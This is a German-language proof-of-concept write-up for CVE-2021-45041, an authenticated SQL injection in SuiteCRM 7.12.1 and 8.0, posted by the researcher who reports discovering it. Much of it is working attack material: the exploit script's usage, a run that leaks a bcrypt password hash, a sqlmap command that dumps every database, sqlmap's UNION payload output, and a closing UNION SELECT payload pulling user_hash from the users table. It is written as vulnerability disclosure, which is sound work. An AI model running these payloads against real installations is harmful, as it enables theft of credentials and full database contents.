
PoC für CVE-2021-45041
PoC für CVE-2021-45041 auch bekannt als SCRMBT-#177 - Authenticated SQL-Injection in SuiteCRM <= 8.0
Optionen:
(.venv) ➜ CVE-2021-45041 git:(main) ./exploit.py --help
Usage: exploit.py [OPTIONS]
Options:
-h, --host TEXT Root of SuiteCRM installation. Defaults to
http://localhost
-u, --username TEXT Username
-p, --password TEXT password
-c, --col_count INTEGER Number of columns to use in union query. Defaults
to 44
-d, --dbms TEXT DBMs used by SuiteCRM. Defaults to mysql
-d, --is_core BOOLEAN SuiteCRM Core (>= 8.0.0). Defaults to False
--help Show this message and exit.
https://github.com/manuelz120/CVE-2021-45041
Beispielverwendung:
(.venv) ➜ CVE-2021-45041 git:(main) ✗ ./exploit.py --host http://localhost --username user --password ******
INFO:CVE-2021-45041:Login did work - Trying to leak user hash to check if SuiteCRM is vulnerable
INFO:CVE-2021-45041:Received the following hash: $2y$10$WTN2aqQOyHUWxBjubqvYrukTOOE.rrfmE4SoogFbv4kc9dXu7vZzq
INFO:CVE-2021-45041:If this doesn't look like a password hash, the exploit might not work correctly
INFO:CVE-2021-45041:Launching sqlmap against target to get full DB dump
INFO:CVE-2021-45041:sqlmap -u 'http://localhost/index.php?module=Project&action=Tooltips&resource_id=test%5C&start_date=%29+*' --headers 'Cookie: PHPSESSID=93b4g4bfd3ak199iiiands8cv8; sugar_user_theme=SuiteP' --technique U --dbms mysql --union-cols=44 --batch --dump-all
___
__H__
___ ___[.]_____ ___ ___ {1.5.12#pip}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:42:51 /2021-12-27/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[21:42:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 44 columns (custom)
Payload: http://localhost:80/index.php?module=Project&action=Tooltips&resource_id=test\&start_date=-8702) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x52736356547967794948526b714b71584c55516679466d45537956795a546d664d74516d54644f41,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:42:52] [INFO] testing MySQL
[21:42:52] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[21:42:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.51
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[21:42:52] [INFO] sqlmap will dump entries of all tables from all databases now
[21:42:52] [INFO] fetching database names
...
Ich habe kürzlich eine authentifizierte SQL-Injection in SuiteCRM entdeckt. Ich konnte die Schwachstelle in Version 8.0 und 7.12.1 verifizieren. Die Schwachstelle befindet sich in der Tooltips-Aktion des Project-Moduls. In einer Standardinstallation kann jeder Benutzer diese Aktion aufrufen, indem er die folgende URL aufruft (für Version 8 mit dem /legacy-Präfix):
/index.php?module=Project&action=Tooltips&resource_id=test&start_date=test
Wenn wir uns die Implementierung dieser Aktion ansehen (siehe
https://github.com/salesagility/SuiteCRM-Core/blob/v8.0.0/public/legacy/modules/Project/controller.php#L485-L513), können wir sehen, dass die Werte direkt aus $_REQUEST übernommen werden, ohne weitere Bereinigung, und später in der where-Klausel der Abfrage verwendet werden.

Obwohl wir wegen der HTML-Entity-Kodierung keine einfachen Anführungszeichen verwenden können, ist dies dennoch ausnutzbar, da es mehrere Injektionspunkte gibt. Wenn wir eine resource_id angeben, die mit einem Backslash (\) endet, wird das folgende einfache Anführungszeichen maskiert und die Zeichenkette wird erst durch das einfache Anführungszeichen nach dem BETWEEN-Schlüsselwort beendet. Das bedeutet, dass alles, was der Client als start_date sendet, als reines SQL behandelt und für einen SQL-Injection-Angriff verwendet werden kann.
Hier ist ein minimaler PoC, der den Passwort-Hash eines Benutzers preisgibt:
Version 7.12.1:
Version 8.0:
URL-dekodierte Version:
module=Project&action=Tooltips&resource_id=test\&start_date=) UNION SELECT 0, 1, 2, 3, 4, (SELECT user_hash from users limit 1), 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43 from dual; #

Kurz nach meiner Meldung wurden neue SuiteCRM-Versionen (7.12.2 und 8.0.1) veröffentlicht, die den folgenden Fix enthalten: